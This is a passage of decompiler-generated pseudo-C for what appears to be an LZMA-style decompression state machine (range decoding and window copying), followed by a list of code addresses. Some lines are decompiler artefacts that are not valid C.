                  											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                  											__eflags =  *(__ebp - 0x38) - 4;
                  											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                  											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                  											if( *(__ebp - 0x38) >= 4) {
                  												__eflags =  *(__ebp - 0x38) - 0xa;
                  												if( *(__ebp - 0x38) >= 0xa) {
                  													_t98 = __ebp - 0x38;
                  													 *_t98 =  *(__ebp - 0x38) - 6;
                  													__eflags =  *_t98;
                  												} else {
                  													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                  												}
                  											} else {
                  												 *(__ebp - 0x38) = 0;
                  											}
                  											__eflags =  *(__ebp - 0x34) - __edx;
                  											if( *(__ebp - 0x34) == __edx) {
                  												L35:
                  												__ebx = 0;
                  												__ebx = 1;
                  												goto L61;
                  											} else {
                  												L32:
                  												__eax =  *(__ebp - 0x14);
                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                  												__eflags = __eax -  *(__ebp - 0x74);
                  												if(__eax >=  *(__ebp - 0x74)) {
                  													__eax = __eax +  *(__ebp - 0x74);
                  													__eflags = __eax;
                  												}
                  												__ecx =  *(__ebp - 8);
                  												__ebx = 0;
                  												__ebx = 1;
                  												__al =  *((intOrPtr*)(__eax + __ecx));
                  												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                  												goto L41;
                  											}
                  										case 7:
                  											L66:
                  											__eflags =  *(__ebp - 0x40) - 1;
                  											if( *(__ebp - 0x40) != 1) {
                  												L68:
                  												__eax =  *(__ebp - 0x24);
                  												 *(__ebp - 0x80) = 0x16;
                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                  												__eax =  *(__ebp - 0x28);
                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                  												__eax =  *(__ebp - 0x2c);
                  												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                  												__eax = 0;
                  												__eflags =  *(__ebp - 0x38) - 7;
                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                  												__al = __al & 0x000000fd;
                  												__eax = (__eflags >= 0) - 1 + 0xa;
                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                  												__eax =  *(__ebp - 4);
                  												__eax =  *(__ebp - 4) + 0x664;
                  												__eflags = __eax;
                  												 *(__ebp - 0x58) = __eax;
                  												goto L69;
                  											}
                  											L67:
                  											__eax =  *(__ebp - 4);
                  											__ecx =  *(__ebp - 0x38);
                  											 *(__ebp - 0x84) = 8;
                  											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                  											goto L132;
                  										case 8:
                  											L70:
                  											__eflags =  *(__ebp - 0x40);
                  											if( *(__ebp - 0x40) != 0) {
                  												__eax =  *(__ebp - 4);
                  												__ecx =  *(__ebp - 0x38);
                  												 *(__ebp - 0x84) = 0xa;
                  												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                  											} else {
                  												__eax =  *(__ebp - 0x38);
                  												__ecx =  *(__ebp - 4);
                  												__eax =  *(__ebp - 0x38) + 0xf;
                  												 *(__ebp - 0x84) = 9;
                  												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                  												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                  											}
                  											goto L132;
                  										case 9:
                  											L73:
                  											__eflags =  *(__ebp - 0x40);
                  											if( *(__ebp - 0x40) != 0) {
                  												goto L90;
                  											}
                  											L74:
                  											__eflags =  *(__ebp - 0x60);
                  											if( *(__ebp - 0x60) == 0) {
                  												goto L171;
                  											}
                  											L75:
                  											__eax = 0;
                  											__eflags =  *(__ebp - 0x38) - 7;
                  											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                  											__eflags = _t259;
                  											0 | _t259 = _t259 + _t259 + 9;
                  											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                  											goto L76;
                  										case 0xa:
                  											L82:
                  											__eflags =  *(__ebp - 0x40);
                  											if( *(__ebp - 0x40) != 0) {
                  												L84:
                  												__eax =  *(__ebp - 4);
                  												__ecx =  *(__ebp - 0x38);
                  												 *(__ebp - 0x84) = 0xb;
                  												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                  												goto L132;
                  											}
                  											L83:
                  											__eax =  *(__ebp - 0x28);
                  											goto L89;
                  										case 0xb:
                  											L85:
                  											__eflags =  *(__ebp - 0x40);
                  											if( *(__ebp - 0x40) != 0) {
                  												__ecx =  *(__ebp - 0x24);
                  												__eax =  *(__ebp - 0x20);
                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                  											} else {
                  												__eax =  *(__ebp - 0x24);
                  											}
                  											__ecx =  *(__ebp - 0x28);
                  											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                  											L89:
                  											__ecx =  *(__ebp - 0x2c);
                  											 *(__ebp - 0x2c) = __eax;
                  											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                  											L90:
                  											__eax =  *(__ebp - 4);
                  											 *(__ebp - 0x80) = 0x15;
                  											__eax =  *(__ebp - 4) + 0xa68;
                  											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                  											goto L69;
                  										case 0xc:
                  											L99:
                  											__eflags =  *(__ebp - 0x6c);
                  											if( *(__ebp - 0x6c) == 0) {
                  												L164:
                  												 *(__ebp - 0x88) = 0xc;
                  												goto L170;
                  											}
                  											L100:
                  											__ecx =  *(__ebp - 0x70);
                  											__eax =  *(__ebp - 0xc);
                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											_t334 = __ebp - 0x70;
                  											 *_t334 =  *(__ebp - 0x70) + 1;
                  											__eflags =  *_t334;
                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											__eax =  *(__ebp - 0x2c);
                  											goto L101;
                  										case 0xd:
                  											L37:
                  											__eflags =  *(__ebp - 0x6c);
                  											if( *(__ebp - 0x6c) == 0) {
                  												L159:
                  												 *(__ebp - 0x88) = 0xd;
                  												goto L170;
                  											}
                  											L38:
                  											__ecx =  *(__ebp - 0x70);
                  											__eax =  *(__ebp - 0xc);
                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											_t122 = __ebp - 0x70;
                  											 *_t122 =  *(__ebp - 0x70) + 1;
                  											__eflags =  *_t122;
                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											L39:
                  											__eax =  *(__ebp - 0x40);
                  											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                  											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                  												goto L48;
                  											}
                  											L40:
                  											__eflags = __ebx - 0x100;
                  											if(__ebx >= 0x100) {
                  												goto L54;
                  											}
                  											L41:
                  											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                  											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                  											__ecx =  *(__ebp - 0x58);
                  											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                  											 *(__ebp - 0x48) = __eax;
                  											__eax = __eax + 1;
                  											__eax = __eax << 8;
                  											__eax = __eax + __ebx;
                  											__esi =  *(__ebp - 0x58) + __eax * 2;
                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                  											__ax =  *__esi;
                  											 *(__ebp - 0x54) = __esi;
                  											__edx = __ax & 0x0000ffff;
                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                  											__eflags =  *(__ebp - 0xc) - __ecx;
                  											if( *(__ebp - 0xc) >= __ecx) {
                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                  												__cx = __ax;
                  												 *(__ebp - 0x40) = 1;
                  												__cx = __ax >> 5;
                  												__eflags = __eax;
                  												__ebx = __ebx + __ebx + 1;
                  												 *__esi = __ax;
                  											} else {
                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                  												 *(__ebp - 0x10) = __ecx;
                  												0x800 = 0x800 - __edx;
                  												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                  												__ebx = __ebx + __ebx;
                  												 *__esi = __cx;
                  											}
                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                  											 *(__ebp - 0x44) = __ebx;
                  											if( *(__ebp - 0x10) >= 0x1000000) {
                  												goto L39;
                  											} else {
                  												L45:
                  												goto L37;
                  											}
                  										case 0xe:
                  											L46:
                  											__eflags =  *(__ebp - 0x6c);
                  											if( *(__ebp - 0x6c) == 0) {
                  												L160:
                  												 *(__ebp - 0x88) = 0xe;
                  												goto L170;
                  											}
                  											L47:
                  											__ecx =  *(__ebp - 0x70);
                  											__eax =  *(__ebp - 0xc);
                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											_t156 = __ebp - 0x70;
                  											 *_t156 =  *(__ebp - 0x70) + 1;
                  											__eflags =  *_t156;
                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											while(1) {
                  												L48:
                  												__eflags = __ebx - 0x100;
                  												if(__ebx >= 0x100) {
                  													break;
                  												}
                  												L49:
                  												__eax =  *(__ebp - 0x58);
                  												__edx = __ebx + __ebx;
                  												__ecx =  *(__ebp - 0x10);
                  												__esi = __edx + __eax;
                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                  												__ax =  *__esi;
                  												 *(__ebp - 0x54) = __esi;
                  												__edi = __ax & 0x0000ffff;
                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                  												__eflags =  *(__ebp - 0xc) - __ecx;
                  												if( *(__ebp - 0xc) >= __ecx) {
                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                  													__cx = __ax;
                  													_t170 = __edx + 1; // 0x1
                  													__ebx = _t170;
                  													__cx = __ax >> 5;
                  													__eflags = __eax;
                  													 *__esi = __ax;
                  												} else {
                  													 *(__ebp - 0x10) = __ecx;
                  													0x800 = 0x800 - __edi;
                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                  													__ebx = __ebx + __ebx;
                  													 *__esi = __cx;
                  												}
                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                  												 *(__ebp - 0x44) = __ebx;
                  												if( *(__ebp - 0x10) >= 0x1000000) {
                  													continue;
                  												} else {
                  													L53:
                  													goto L46;
                  												}
                  											}
                  											L54:
                  											_t173 = __ebp - 0x34;
                  											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                  											__eflags =  *_t173;
                  											goto L55;
                  										case 0xf:
                  											L58:
                  											__eflags =  *(__ebp - 0x6c);
                  											if( *(__ebp - 0x6c) == 0) {
                  												L161:
                  												 *(__ebp - 0x88) = 0xf;
                  												goto L170;
                  											}
                  											L59:
                  											__ecx =  *(__ebp - 0x70);
                  											__eax =  *(__ebp - 0xc);
                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											_t203 = __ebp - 0x70;
                  											 *_t203 =  *(__ebp - 0x70) + 1;
                  											__eflags =  *_t203;
                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											L60:
                  											__eflags = __ebx - 0x100;
                  											if(__ebx >= 0x100) {
                  												L55:
                  												__al =  *(__ebp - 0x44);
                  												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                  												goto L56;
                  											}
                  											L61:
                  											__eax =  *(__ebp - 0x58);
                  											__edx = __ebx + __ebx;
                  											__ecx =  *(__ebp - 0x10);
                  											__esi = __edx + __eax;
                  											__ecx =  *(__ebp - 0x10) >> 0xb;
                  											__ax =  *__esi;
                  											 *(__ebp - 0x54) = __esi;
                  											__edi = __ax & 0x0000ffff;
                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                  											__eflags =  *(__ebp - 0xc) - __ecx;
                  											if( *(__ebp - 0xc) >= __ecx) {
                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                  												__cx = __ax;
                  												_t217 = __edx + 1; // 0x1
                  												__ebx = _t217;
                  												__cx = __ax >> 5;
                  												__eflags = __eax;
                  												 *__esi = __ax;
                  											} else {
                  												 *(__ebp - 0x10) = __ecx;
                  												0x800 = 0x800 - __edi;
                  												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                  												__ebx = __ebx + __ebx;
                  												 *__esi = __cx;
                  											}
                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                  											 *(__ebp - 0x44) = __ebx;
                  											if( *(__ebp - 0x10) >= 0x1000000) {
                  												goto L60;
                  											} else {
                  												L65:
                  												goto L58;
                  											}
                  										case 0x10:
                  											L109:
                  											__eflags =  *(__ebp - 0x6c);
                  											if( *(__ebp - 0x6c) == 0) {
                  												L165:
                  												 *(__ebp - 0x88) = 0x10;
                  												goto L170;
                  											}
                  											L110:
                  											__ecx =  *(__ebp - 0x70);
                  											__eax =  *(__ebp - 0xc);
                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											_t365 = __ebp - 0x70;
                  											 *_t365 =  *(__ebp - 0x70) + 1;
                  											__eflags =  *_t365;
                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											goto L111;
                  										case 0x11:
                  											L69:
                  											__esi =  *(__ebp - 0x58);
                  											 *(__ebp - 0x84) = 0x12;
                  											goto L132;
                  										case 0x12:
                  											L128:
                  											__eflags =  *(__ebp - 0x40);
                  											if( *(__ebp - 0x40) != 0) {
                  												L131:
                  												__eax =  *(__ebp - 0x58);
                  												 *(__ebp - 0x84) = 0x13;
                  												__esi =  *(__ebp - 0x58) + 2;
                  												L132:
                  												 *(_t644 - 0x54) = _t642;
                  												goto L133;
                  											}
                  											L129:
                  											__eax =  *(__ebp - 0x4c);
                  											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                  											__ecx =  *(__ebp - 0x58);
                  											__eax =  *(__ebp - 0x4c) << 4;
                  											__eflags = __eax;
                  											__eax =  *(__ebp - 0x58) + __eax + 4;
                  											goto L130;
                  										case 0x13:
                  											L141:
                  											__eflags =  *(__ebp - 0x40);
                  											if( *(__ebp - 0x40) != 0) {
                  												L143:
                  												_t469 = __ebp - 0x58;
                  												 *_t469 =  *(__ebp - 0x58) + 0x204;
                  												__eflags =  *_t469;
                  												 *(__ebp - 0x30) = 0x10;
                  												 *(__ebp - 0x40) = 8;
                  												L144:
                  												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                  												L145:
                  												 *(_t644 - 0x50) = 1;
                  												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                  												goto L149;
                  											}
                  											L142:
                  											__eax =  *(__ebp - 0x4c);
                  											__ecx =  *(__ebp - 0x58);
                  											__eax =  *(__ebp - 0x4c) << 4;
                  											 *(__ebp - 0x30) = 8;
                  											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                  											L130:
                  											 *(__ebp - 0x58) = __eax;
                  											 *(__ebp - 0x40) = 3;
                  											goto L144;
                  										case 0x14:
                  											L156:
                  											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                  											__eax =  *(__ebp - 0x80);
                  											while(1) {
                  												L140:
                  												 *(_t644 - 0x88) = _t537;
                  												goto L1;
                  											}
                  										case 0x15:
                  											L91:
                  											__eax = 0;
                  											__eflags =  *(__ebp - 0x38) - 7;
                  											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                  											__al = __al & 0x000000fd;
                  											__eax = (__eflags >= 0) - 1 + 0xb;
                  											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                  											goto L120;
                  										case 0x16:
                  											goto L0;
                  										case 0x17:
                  											while(1) {
                  												L145:
                  												 *(_t644 - 0x50) = 1;
                  												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                  												goto L149;
                  											}
                  										case 0x18:
                  											goto L146;
                  										case 0x19:
                  											L94:
                  											__eflags = __ebx - 4;
                  											if(__ebx < 4) {
                  												L98:
                  												 *(__ebp - 0x2c) = __ebx;
                  												L119:
                  												_t393 = __ebp - 0x2c;
                  												 *_t393 =  *(__ebp - 0x2c) + 1;
                  												__eflags =  *_t393;
                  												L120:
                  												__eax =  *(__ebp - 0x2c);
                  												__eflags = __eax;
                  												if(__eax == 0) {
                  													L166:
                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                  													goto L170;
                  												}
                  												L121:
                  												__eflags = __eax -  *(__ebp - 0x60);
                  												if(__eax >  *(__ebp - 0x60)) {
                  													goto L171;
                  												}
                  												L122:
                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                  												__eax =  *(__ebp - 0x30);
                  												_t400 = __ebp - 0x60;
                  												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                  												__eflags =  *_t400;
                  												goto L123;
                  											}
                  											L95:
                  											__ecx = __ebx;
                  											__eax = __ebx;
                  											__ecx = __ebx >> 1;
                  											__eax = __ebx & 0x00000001;
                  											__ecx = (__ebx >> 1) - 1;
                  											__al = __al | 0x00000002;
                  											__eax = (__ebx & 0x00000001) << __cl;
                  											__eflags = __ebx - 0xe;
                  											 *(__ebp - 0x2c) = __eax;
                  											if(__ebx >= 0xe) {
                  												L97:
                  												__ebx = 0;
                  												 *(__ebp - 0x48) = __ecx;
                  												L102:
                  												__eflags =  *(__ebp - 0x48);
                  												if( *(__ebp - 0x48) <= 0) {
                  													L107:
                  													__eax = __eax + __ebx;
                  													 *(__ebp - 0x40) = 4;
                  													 *(__ebp - 0x2c) = __eax;
                  													__eax =  *(__ebp - 4);
                  													__eax =  *(__ebp - 4) + 0x644;
                  													__eflags = __eax;
                  													L108:
                  													__ebx = 0;
                  													 *(__ebp - 0x58) = __eax;
                  													 *(__ebp - 0x50) = 1;
                  													 *(__ebp - 0x44) = 0;
                  													 *(__ebp - 0x48) = 0;
                  													L112:
                  													__eax =  *(__ebp - 0x40);
                  													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                  													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                  														L118:
                  														_t391 = __ebp - 0x2c;
                  														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                  														__eflags =  *_t391;
                  														goto L119;
                  													}
                  													L113:
                  													__eax =  *(__ebp - 0x50);
                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                  													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                  													__eax =  *(__ebp - 0x58);
                  													__esi = __edi + __eax;
                  													 *(__ebp - 0x54) = __esi;
                  													__ax =  *__esi;
                  													__ecx = __ax & 0x0000ffff;
                  													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                  													__eflags =  *(__ebp - 0xc) - __edx;
                  													if( *(__ebp - 0xc) >= __edx) {
                  														__ecx = 0;
                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                  														__ecx = 1;
                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                  														__ebx = 1;
                  														__ecx =  *(__ebp - 0x48);
                  														__ebx = 1 << __cl;
                  														__ecx = 1 << __cl;
                  														__ebx =  *(__ebp - 0x44);
                  														__ebx =  *(__ebp - 0x44) | __ecx;
                  														__cx = __ax;
                  														__cx = __ax >> 5;
                  														__eax = __eax - __ecx;
                  														__edi = __edi + 1;
                  														__eflags = __edi;
                  														 *(__ebp - 0x44) = __ebx;
                  														 *__esi = __ax;
                  														 *(__ebp - 0x50) = __edi;
                  													} else {
                  														 *(__ebp - 0x10) = __edx;
                  														0x800 = 0x800 - __ecx;
                  														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                  														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                  														 *__esi = __dx;
                  													}
                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                  													if( *(__ebp - 0x10) >= 0x1000000) {
                  														L111:
                  														_t368 = __ebp - 0x48;
                  														 *_t368 =  *(__ebp - 0x48) + 1;
                  														__eflags =  *_t368;
                  														goto L112;
                  													} else {
                  														L117:
                  														goto L109;
                  													}
                  												}
                  												L103:
                  												__ecx =  *(__ebp - 0xc);
                  												__ebx = __ebx + __ebx;
                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                  												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                  												 *(__ebp - 0x44) = __ebx;
                  												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                  													__ecx =  *(__ebp - 0x10);
                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                  													__ebx = __ebx | 0x00000001;
                  													__eflags = __ebx;
                  													 *(__ebp - 0x44) = __ebx;
                  												}
                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                  												if( *(__ebp - 0x10) >= 0x1000000) {
                  													L101:
                  													_t338 = __ebp - 0x48;
                  													 *_t338 =  *(__ebp - 0x48) - 1;
                  													__eflags =  *_t338;
                  													goto L102;
                  												} else {
                  													L106:
                  													goto L99;
                  												}
                  											}
                  											L96:
                  											__edx =  *(__ebp - 4);
                  											__eax = __eax - __ebx;
                  											 *(__ebp - 0x40) = __ecx;
                  											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                  											goto L108;
                  										case 0x1a:
                  											L56:
                  											__eflags =  *(__ebp - 0x64);
                  											if( *(__ebp - 0x64) == 0) {
                  												L162:
                  												 *(__ebp - 0x88) = 0x1a;
                  												goto L170;
                  											}
                  											L57:
                  											__ecx =  *(__ebp - 0x68);
                  											__al =  *(__ebp - 0x5c);
                  											__edx =  *(__ebp - 8);
                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                  											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                  											 *( *(__ebp - 0x68)) = __al;
                  											__ecx =  *(__ebp - 0x14);
                  											 *(__ecx +  *(__ebp - 8)) = __al;
                  											__eax = __ecx + 1;
                  											__edx = 0;
                  											_t192 = __eax %  *(__ebp - 0x74);
                  											__eax = __eax /  *(__ebp - 0x74);
                  											__edx = _t192;
                  											goto L80;
                  										case 0x1b:
                  											L76:
                  											__eflags =  *(__ebp - 0x64);
                  											if( *(__ebp - 0x64) == 0) {
                  												L163:
                  												 *(__ebp - 0x88) = 0x1b;
                  												goto L170;
                  											}
                  											L77:
                  											__eax =  *(__ebp - 0x14);
                  											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                  											__eflags = __eax -  *(__ebp - 0x74);
                  											if(__eax >=  *(__ebp - 0x74)) {
                  												__eax = __eax +  *(__ebp - 0x74);
                  												__eflags = __eax;
                  											}
                  											__edx =  *(__ebp - 8);
                  											__cl =  *(__eax + __edx);
                  											__eax =  *(__ebp - 0x14);
                  											 *(__ebp - 0x5c) = __cl;
                  											 *(__eax + __edx) = __cl;
                  											__eax = __eax + 1;
                  											__edx = 0;
                  											_t275 = __eax %  *(__ebp - 0x74);
                  											__eax = __eax /  *(__ebp - 0x74);
                  											__edx = _t275;
                  											__eax =  *(__ebp - 0x68);
                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                  											_t284 = __ebp - 0x64;
                  											 *_t284 =  *(__ebp - 0x64) - 1;
                  											__eflags =  *_t284;
                  											 *( *(__ebp - 0x68)) = __cl;
                  											L80:
                  											 *(__ebp - 0x14) = __edx;
                  											goto L81;
                  										case 0x1c:
                  											while(1) {
                  												L123:
                  												__eflags =  *(__ebp - 0x64);
                  												if( *(__ebp - 0x64) == 0) {
                  													break;
                  												}
                  												L124:
                  												__eax =  *(__ebp - 0x14);
                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                  												__eflags = __eax -  *(__ebp - 0x74);
                  												if(__eax >=  *(__ebp - 0x74)) {
                  													__eax = __eax +  *(__ebp - 0x74);
                  													__eflags = __eax;
                  												}
                  												__edx =  *(__ebp - 8);
                  												__cl =  *(__eax + __edx);
                  												__eax =  *(__ebp - 0x14);
                  												 *(__ebp - 0x5c) = __cl;
                  												 *(__eax + __edx) = __cl;
                  												__eax = __eax + 1;
                  												__edx = 0;
                  												_t414 = __eax %  *(__ebp - 0x74);
                  												__eax = __eax /  *(__ebp - 0x74);
                  												__edx = _t414;
                  												__eax =  *(__ebp - 0x68);
                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                  												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                  												__eflags =  *(__ebp - 0x30);
                  												 *( *(__ebp - 0x68)) = __cl;
                  												 *(__ebp - 0x14) = _t414;
                  												if( *(__ebp - 0x30) > 0) {
                  													continue;
                  												} else {
                  													L127:
                  													L81:
                  													 *(__ebp - 0x88) = 2;
                  													goto L1;
                  												}
                  											}
                  											L167:
                  											 *(__ebp - 0x88) = 0x1c;
                  											goto L170;
                  									}
                  								}
                  								L171:
                  								_t539 = _t538 | 0xffffffff;
                  								goto L172;
                  							}
                  						}
                  					}
                  				}
                  			}















                  0x004065a3
                  0x004065a9
                  0x004065ac
                  0x004065af
                  0x004065b2
                  0x004065b5
                  0x004065b8
                  0x004065bb
                  0x004065be
                  0x004065c1
                  0x004065c4
                  0x004065dd
                  0x004065df
                  0x004065e2
                  0x004065e3
                  0x004065e6
                  0x004065e8
                  0x004065eb
                  0x004065ed
                  0x004065ef
                  0x004065f2
                  0x004065f4
                  0x004065f7
                  0x004065fb
                  0x004065fd
                  0x004065fd
                  0x004065fe
                  0x00406601
                  0x00406604
                  0x004065c6
                  0x004065c6
                  0x004065ce
                  0x004065d3
                  0x004065d5
                  0x004065d8
                  0x004065d8
                  0x00406607
                  0x0040660e
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00000000
                  0x00406610
                  0x00406610
                  0x00000000
                  0x00406610
                  0x0040660e
                  0x00406521
                  0x00406521
                  0x00406524
                  0x00406526
                  0x00406529
                  0x0040652c
                  0x0040652f
                  0x00406531
                  0x00406534
                  0x00406537
                  0x00406537
                  0x0040653a
                  0x0040653a
                  0x0040653d
                  0x00406544
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00000000
                  0x00406546
                  0x00406546
                  0x00000000
                  0x00406546
                  0x00406544
                  0x004064ca
                  0x004064ca
                  0x004064cd
                  0x004064cf
                  0x004064d2
                  0x00000000
                  0x00000000
                  0x00406231
                  0x00406231
                  0x00406235
                  0x0040687a
                  0x0040687a
                  0x00000000
                  0x0040687a
                  0x0040623b
                  0x0040623b
                  0x0040623e
                  0x00406241
                  0x00406244
                  0x00406247
                  0x0040624a
                  0x0040624d
                  0x0040624f
                  0x00406252
                  0x00406255
                  0x00406258
                  0x0040625a
                  0x0040625a
                  0x0040625a
                  0x00000000
                  0x00000000
                  0x004063bc
